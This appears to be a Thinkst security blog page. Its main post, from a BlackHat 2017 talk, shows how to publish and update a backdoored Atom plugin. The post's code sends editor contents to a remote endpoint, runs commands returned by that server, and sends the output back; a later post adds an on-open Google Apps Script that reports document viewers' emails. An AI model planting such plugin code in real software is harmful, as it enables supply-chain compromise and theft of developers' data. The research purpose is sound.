All your devs are belong to us: how to backdoor the Atom editor

This is the first post in a series highlighting bits from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.

Introduction

In this post we'll be looking at ways to compromise your developers that you probably aren't defending against, by exploiting the plugins in their editors. We will therefore be exploring Atom, Atom plugins, how they work and the security shortfalls they expose.

Targeting developers seems like a good idea (targeting sysadmins is so 2014). If we can target them through a channel that you probably aren't auditing, thats even better!

Background

We all need some type of editor in our lives to be able to do the work that we do. But, when it comes to choosing an editor, everyone has their own views. Some prefer the modern editors like Atom or Sublime, while others are more die-hard/ old school and prefer to stick to Vim or Emacs. Whatever you chose, you'll most likely want to customize it in some way (if not, I am not sure I can trust you as a person let alone a developer).  

Plugins and Extensions on modern editors are robust. Aside from cosmetic customization (font, color scheme, etc) they also allow you a range of functionality to make your life easier: from autocomplete and linters to minimaps, beautifiers and git integration, you should be able to find a plugin that suits your needs. If you don't, you can just create and publish one.

Other users will download new plugins to suit their needs, continuously adding to their ever growing list of them (because who has the time to go back and delete old unused plugins?) Many editors support automatic updates to ensure that any bugs are fixed and new features are enjoyed immediately.

For this post I'll focus specifically on Atom, Github's shiny new editor.  According to their site it's a "hackable text editor for the 21st century" (heh!). Atom's user base is continuously growing, along with their vast selection of packages.  You can even install Atom on your Chromebook with a few hacks, which bypasses the basic security model on ChromeOS.

The Goal

I was tasked with exploring the extent of damage that a malicious Atom plugin could do. We weren't sure what obstacles we'd face or what security measures were in place to stop us being evil. It turns out there were none... within a couple hours I had not only published my first app, but had updated it to include a little bit of malicious code too. 

The plan was simple:


Step One:  Get a simple package (plugin) published
  • What was required and how difficult would it be (do we need our app to be vetted)?
Step Two:  Test the update process
  • If you were going to create a malicious package you'd first create a useful non-malicious one that would create a large user base and then push an update that would inject the unsavory code.
Step Three:  Actually test what we could achieve from within an Atom package
  • We'd need to determine if there was any form of sandboxing, what libraries we'd have access to, etc.

Hello Plugin

Step One

This was trivially simple. There are lots of guides to creating and publishing packages for Atom out there, including a detailed one on their site.  

Generate a new package:

cmd + shift + p
Package Generator: Generate Package 

This will give you a package with a simple toggle method that we will use later:

toggle: ->
    console.log 'touch-type-teacher was toggled!'

Push the code to a Git repo:

git init
git add .
git commit -m "First commit"
git remote add origin <remote_repo_url>
git push -u origin master

Publish your Atom package 

apm-beta publish minor

Step Two

This was even easier seeing as the initial setup was complete:  

Make a change:

toggle: ->
    console.log 'touch-type-teacher was toggled!'
    console.log 'update test'

Push it to Github:

git commit -a -m 'Add console logging'
git push

Publish the new version:

apm-beta publish minor

So that's step one and two done, showing how easy it is to publish and update your package. The next step was to see what could actually be done with your package.  


That seems like a reasonable request

Step Three

Seeing as packages are built on node.js, the initial test was to see what modules we had access to.

The request package seemed a good place to start as it would allow us to get data off the user's machine and into our hands.

Some quick digging found that it was easy to add a dependency to our package:

npm install --save request@2.73.0
apm install

Import this in our code:

request = require 'request'

Update our code to post some data to our remote endpoint:

toggle: ->
    request 'http://my-remote-endpoint.com/run?data=test_data', (error, response, body) =>            
        console.log 'Data sent!'

With this, our package will happily send information to us whenever toggled.

Now that we have a way to get information out, we needed to see what kind of information we had access to.

Hi, my name is...

Let's change our toggle function to try and get the current user and post that:

toggle: ->
    {spawn} = require 'child_process'
    test = spawn 'whoami'
    test.stdout.on 'data', (data) ->
        request 'http://my-remote-endpoint.com/run?data='+data.toString().trim(), (error, response, body) =>
            console.log 'Output sent!'

This actually worked too... meaning we had the ability to run commands on the user's machine and then extract the output from them if needed.

At this point we had enough information to write it up, but we took it a little further (just for kicks).

Simon Says

Instead of hardcoding commands into our code, let's send it commands to run dynamically! While we are at it, instead of only firing on toggling of our package, let's fire whenever a key is pressed.

First we'll need to hook onto the onChange event of the current editor:

module.exports = TouchTypeTeacher =
  touchTypeTeacherView: null
  modalPanel: null
  subscriptions: null
  editor: null

  activate: (state) ->
    @touchTypeTeacherView = new TouchTypeTeacherView(state.touchTypeTeacherViewState)
    @modalPanel = atom.workspace.addModalPanel(item: @touchTypeTeacherView.getElement(), visible: false)
    @editor = atom.workspace.getActiveTextEditor()
    @subscriptions = new CompositeDisposable

    @subscriptions.add atom.commands.add 'atom-workspace', 'touch-type-teacher:toggle': => @toggle()
    @subscriptions.add @editor.onDidChange (change) => @myChange()

Then create the myChange function that will do the dirty work:

myChange: ->
    request 'http://my-remote-endpoint.com/test?data=' +@editor.getText(), (error, response, body) =>
        {spawn} = require 'child_process'
        test = spawn body
        console.log 'External code to run:\n' + body
        test.stdout.on 'data', (data) ->
           console.log 'sending output'
           request 'http://my-remote-endpoint.com/run?data=' + data.toString().trim(), (error, response, body) =>
               console.log 'output sent!'

What happens in this code snippet is a bit of overkill but it demonstrates our point. On every change in the editor we will send the text in the editor to our endpoint, which in turn returns a new command to execute. We run the command and send the output back to the endpoint.

Demo

Below is a demo of it in action. On the left you'll see the user typing into the editor, and on the right you'll see the logs on our remote server.

video


Our little plugin is not going to be doing global damage anytime soon. In fact we unpublished it once our tests were done. But what if someone changed an existing plugin which had lots of active users? Enter Kite.

Kite and friends

While we were ironing out the demo and wondering how prevalent this kind of attack was, an interesting story emerged. Kite, who make cloud-based coding tools, hired the developer of Minimap (an Atom plugin with over 3.8 million downloads) and pushed an update for it labelled "Implement Kite promotion". This update, among other things, inserted Kite ads onto the minimap.

In conjunction with this, it was found that Kite had silently acquired autocomplete-python (another popular Atom plugin) a few months prior and had promoted the use of Kite over the open source alternative.

Once discovered, Kite was forced to apologize and take steps to ensure they would not do it again (but someone else totally could!).

Similar to the Kite takeover of Atom packages (but with more malicious intent) in the past week it has been reported that two Chrome extensions had been taken over by attackers and had adware injected into them. Web Developer for Chrome and Copyfish both fell victims to the same phishing attack. Details of the events can be read about here (Web Developer) and here (Copyfish) but the gist of it was the popular extensions for Chrome had been compromised and users of the extensions fell victim without knowing it.

Wrapping up

We created a plugin and published it without it being picked up as malicious. This plugin runs without a sandbox and without a restrictive permissions model to prevent us stealing all the information the user has access to. Even if there was some kind of code analysis conducted on uploaded code, it's possible to remotely eval() code at runtime.  Automatic updates means that even if our plugin is benign today, it could be malicious tomorrow.

Forcing developers to use only a certain controlled set of tools/plugins seems draconian, but if it is not controlled, it's getting more and more difficult to secure.



BlackHat 2017 Series

[Update: jump to the end of the page for the series index]

Late July found Haroon and I sweating buckets inside an 8th storey Las Vegas hotel room. Our perspiration was due not to the malevolent heat outside but to the 189 slides we were building for BlackHat 2017. Modifications to the slidedeck continued until just before the talk, and we're now posting a link to the final deck. Spoiler alert: it's at the bottom of this post.

A few years ago (2009, but who's counting) we spoke at the same conference and then at DEF CON on Clobbering the Cloud. It's a little hard to recall the zeitgeist of bygone times, but back then the view that "the Cloud is nothing new" was prominent in security circles (and, more broadly, in IT). The main thrust of the previous talk was taking aim at that viewpoint, showing a bunch of novel attacks on cloud providers and how things were changing:


Eight years on, and here we are again talking about Cloud. In the intervening years we've built and run a cloud-reliant product company, and securing that chews up a significant amount of our time. With the benefit of actual day-to-day usage and experience we took another crack at Cloud security. This time the main thrust of our talk was:


In our 2017 talk we touch on a bunch of ways in which security teams are often still hobbled by a view of Cloud computing that's rooted in the past, while product teams have left most of us in the dust. We discuss insane service dependency graphs and we show how simple examples of insignificant issues in third parties boomerang into large headaches. We talk software supply chains for your developers through malicious Atom plugins. Detection is kinda our bag, so we're confident saying that there's a dearth of options in the Cloud space, and go to some lengths to show this. We cover seldom-examined attack patterns in AWS, looking at recon, compromise, lateral movement, privesv, persistence and logging disruption. Lastly we took an initial swing at BeyondCorp, the architecture improvement from Google that's getting a bunch of attention.

We'd be remiss in not mentioning Atlassian's Daniel Grzelak who has been developing attacks against AWS for a while now. He's been mostly a lone voice on the topic.

One of our takeaways is that unless you're one of the few large users of cloud services, it's unlikely you're in a position to devote enough time to understanding the environment. This is a scary proposition as the environment is not fully understood even by the large players. You thought Active Directory was complex? You can host your AD at AWS, it's 1 of 74 possible services you can run on AWS.

The talk was the result of collaboration between a bunch of folks here at Thinkst. Azhar, Jason, Max and Nick all contributed, and in the next few weeks we'll be seeing posts from them talking about specific sub-topics they handled. We'll update this post as each new subtopic is added.

The full slidedeck is available here.

Posts in this series


  1. All your devs are belong to us: how to backdoor the Atom editor

A guide to Birding (aka: Tips for deploying Canaries)

Heres a quick, informal guide to deploying birds. It isn't a Canary user guide and should:
  • be a fun read;
  • be broadly applicable. 
One of Canary's core benefits is that they are quick to deploy (Under 5 minutes from the moment you unbox them) but this guide should seed some ideas for using them to maximum effect.

Grab the Guide Here (No registration, No Tracking Link, No Unnecessary Drama)

If you have thoughts, comments, or ideas, hit us back at info@canary.tools or DM us on twitter @thinkstCanary

Get notifications when someone accesses your Google Documents (aka: having fun with Google Apps Script)


Our MS Word and PDF tokens are a great way to see if anyone is snooping through your documents. One simply places the document in an enticing location and waits. If the document is opened, a notification (containing useful information about the viewer) is sent to you. Both MS Word tokens and PDF tokens work by embedding a link to a resource in the tokened document. When the document is opened an attempt to fetch the resource is made. This is the request which tickles the token-server, which leads to you being notified.

Because so many of us store content on Google Drive we wanted to do something similar with Google Documents and Google Sheets. Using the embedded image approach was possible in Google Sheets, however, due to image caching coupled with weak API support for Google Documents we turned to Google Apps Script.

Google Apps Script is a powerful Javascript platform with which to create add-ons for Google Sheets, Docs, or Forms. Apps Script allows your documents to interface with most Google services - it's pretty sweet. Want to access all your Drive files from a spreadsheet? No problem! Want to access the Google Maps service from a document? No problem! Want to hook the Language API to your Google Forms? Easy. It's also possible to create extensions to share with the community. You can even add custom UI features.

The Apps Script files can be published in three different ways.

  1. The script may be bound to a document (this is the approach we followed);
  2. It may be published as a Chrome extension;
  3. It may be published to be used by the Google Execution API (the Execution API basically allows you to create ones own API endpoints to be used by a client application).  

With the script bound to a document, the Apps Script features most important for our purposes are: Triggers, the UrlFetchApp service, and the Session service. A brief outline of the flow is:

  1. A user opens the document, 
  2. A trigger is fired which grabs the perpetrator's email address;
  3. This is sent via a request notification to the document owner. 

A more detailed outline of each feature is given bellow.

Triggers

Apps Script triggers come in two flavours: simple and installable. The main difference between the two is the number of services they're allowed to access. Many services require user authorisation before giving the app access to a user's data. Each flavour also has separate types. For example: "on open", "on edit", "on install", even timed triggers.  For our purposes the "on open" installable triggers proved most useful.

UrlFetchApp service

This service simply gives one's script the ability to make HTTP requests. This service was used to send the requests needed to notify the document owner that the token'd document had been opened. Useful information about the document viewer may also be sent as the payload of a POST request.

Session service

The Session service provides access to session information, such as the user's email address and language setting. This was used to see exactly which user opened the document.

Putting it all together

So, what does this all look like? Let's go ahead and open up a new Google sheet and navigate to the Script editor.


Open the Script editor


Once in the Script editor create a new function named whatever you like (in our case it is called "notify"). Here a payload object is constructed which contains the email address of the document owner, the email address of the document viewer and the document viewer's locale. This information is then sent to an endpoint. Here we use hookbin for convenience. 


Write a function which sends user information to an endpoint


Once the file has been saved and our notify function is solid, we can go ahead and add the "on open" trigger. To do this: open the Edit tab dropdown from the script editor and go to "Current project's triggers".

Open the project's triggers


Under the current project's triggers add an "On open" trigger to the notify function. This trigger will cause the "notify" function to run each time the document is opened.


Add an "On open" trigger to the "notify" function

Because the function is accessing user data (the Session service) as well as connecting to an external service (sending requests to Hookbin) the script will require a set of permissions to be accepted before being run.


Set of permissions needed by the installable trigger


Once the permissions have been accepted all that remains is for the document to be shared. You can share the document with specific people or anyone on the internet. The only caveat being that the document needs to be shared with EDIT permissions or else the script will not function correctly.

Every time the document is opened post requests will be sent to the endpoint. Below is an example of the contents of the POST request sent to Hookbin.

The request contents received by the endpoint

Limitations

We ran into a few limitations while investigating the use of Apps Script for tokens. While copying a document as another Google user would also copy the script bound to the document, it would not copy the triggers if any had been previously installed. Thus, the user with which the document was shared would need to manually add the triggers to the copied document. Another limitation was that anyone viewing the document needed to have EDIT permissions in order for the script to work correctly. This could prove problematic if the person viewing the document decided to delete/edit the script and/or document.

We overcame this, through some creativity and elbow grease..

onEnd()

Thanks for reading. The methods described here were used in our new Google Docs/Sheets Canarytokens for our Canary product, you should totally check them out! We hope you found this useful and that you'll come up with some other cool new ways to use Google Apps Script!

Introducing our Python API Wrapper


Introducing our Python API Wrapper

With our shiny new Python API wrapper, managing your deployed Canaries has never been simpler. With just a few simple lines of code you'll be able to sort and store incident data, reboot all of your devices, create Canarytokens, and much more (Building URLs correctly and parsing JSON strings is for the birds...).

So, how do you get started? Firstly you'll need to install our package. You can grab it from a number of places:
  • Or simply startup your favourite shell and run "pip install canarytools"
Assuming you already have your own Canary Console (see our website for product options) and a flock of devices, getting started is very easy indeed! First, instantiate the Console object: 


Your API_KEY can be retrieved from your Console's Console Setup page. The CLIENT_DOMAIN is the tag in-front of "canary.tools" in your Console's url. For example in https://testconsole.canary.tools/settings "testconsole" is the domain.

Alternatively a .config file can be downloaded and placed on your system (place this in ~/ for Unix (and Unix-like) environments and C:\Users\{Current Users}\ for Windows environments). This file contains all the goodies needed for the wrapper to communicate with the Console. Grab this from the Canary Console API tab under Console Setup (This is great if you'd rather not keep your api_key and/or domain name in your code base).



Click 'Download Token File' to download the API configuration file.




To give you a taste of what you can do with this wrapper, let's have a look at a few of its features:

Device Features

Want to manage all of your devices from the comfort of your bash-shell? No Problem...

Assuming we have instantiated our Console object we can get a handle to all our devices in a single line of code:

From here it is straightforward to do things such as update all your devices, or even reboot them:

Incident Features

Need the ability to quickly access all of the incidents in your console? We've got you covered. Getting a list of incidents across all your devices and printing the source IP of the incident is easy:

Acknowledging incidents is also straightforward. Let's take a look at acknowledging all incidents from a particular device that are 3 weeks or older:


Canarytoken Features

Canarytokens are one of the newest features enabled on our consoles. (You can read about them here). Manage your Canarytokens with ease. To get a list of all your tokens simply call:

You can also create tokens:


Enable/disable your tokens:


Whitelist Features

If you'd like to whitelist IP addresses and destination ports programmatically, we cater for that too:


This is just a tiny taste of what you can do with the API. Head over to our documentation to see more. We're hoping the API will make your (programatic) interactions with our birds a breeze.

Cloud Canary Beta

Is that a cloud next to Tux?

We are sorry that this blog has been so quiet lately. Our Canary product took off like a rocket and we've had our heads down giving it our all. This month we released version-2 with a bunch of new features. You really should check it out.

Since almost day one, customers have been asking for virtual Canaries.  We generally prefer doing one thing really well over doing multiple things "kinda ok", so we held off virtualising Canary for a long time. This changes now.

With Canary software now on version 2.0 and running happily across thousands of birds, a crack at virtual Canaries make sense. Over the past couple of months we’ve been working to get Canaries virtualised, with a specific focus initially, on Amazon’s EC2.

We're inviting customers to participate in a beta for running Canaries in Amazon’s EC2. The benefits are what you’d expect: no hardware, no waiting for shipments and rapid deployments. You can plaster your EC2 environment with Canaries, trivially.

The beta won't affect your current licensing, and you’re free to deploy as many Cloud Canaries as you like during the beta period. They use the same console as your other birds, and integrate seamlessly.

Mail cloudcanarybeta@canary.tools if you’d like to participate and we'll make it happen.

Slack[ing] off our notifications

We :heart: Slack. The elderly in our team were IRC die hards, but Slack even won them over (if for no other reason, for their awesome iOS changelogs).


Thanks to Slack integrations, its robust API and webhooks, we have data from all over filter into our Slack, from exception reporting to sales enquiries. If it’s something we need to know, we have it pushed through to Slack.


At the same time, our Canary product (which prides itself on helping you “Know. When it matters”) was able to push out alerts via email, sms or over it’s RESTful API. Canaries are designed from the ground up to not be loquacious. I.e They don’t talk much, but when they do, you probably should pay attention. Having them pipe their results into Slack seemed a no-brainer.


Our initial stab at this was simple: By allowing a user to enter the URL for a webhook in their Console, we could send events through to the Slack channel of their choosing.

Thinkst Canary - Configuration 🔊 2016-05-26 11-04-27.png


Of course, this wasn’t all that was needed to this get working. The user would first have to create their webhook. Typically, this would require the user to:

Click on his team name, and navigate to Apps & Integrations


Hit the slack apps page and navigate to “Build”


Be confused for a while before choosing “Make a custom integration”

Select “Incoming Webhooks”



At this point the user either:
1.Decides this is too much work and goes to watch Game of Thrones
2.Goes to read the “Getting started” Guide before going to [a]
3.Chooses his destination channel and clicks “Add Incoming webhooks Integration” 


After all this, the user’s reward is a page with way more options than is required for our needs (from a developer's point of view, the options are a delight and the documentation is super helpful, but for an end user... Oy vey!)

Finally... the user can grab the webhook URL, and insert it in the settings page of their console.

(This isn’t the most complicated thing ever... It’s not as confusing as trying to download the JDK - but Canary is supposed to make our users' lives easier, not drive them to drink)

With a bit of searching, we  found the Slack Button.  

add_to_slack@2x.png

This is Slack's way of allowing developers to make deploying integrations quick and painless. This means that our previous 8 step process (9 if you count watching Game of Thrones) becomes the following:

The User clicks on the “Add to Slack” button (above)

He is automatically directed to a page where he authorises the action (and chooses a destination channel) 



There is no step 3:



Of course, we do a little more work, to allow our users to easily add multiple integrations, but this is because we are pretty fanatical about what we do.

At the end of it though, 2 quick steps, and you too can have Canary goodness funnelled to one of your Slack channels!

Slack 2016-05-25 12-22-32.png

At the moment, we simply use the incoming webhooks to post alerts into Slack but there is lots of room to expand using slash commands or bot users, and we heard that all the cool kids are building bots. (aka: watch this space!)  

P.S. If you are a client, visit /settings on your console to see the new functionality.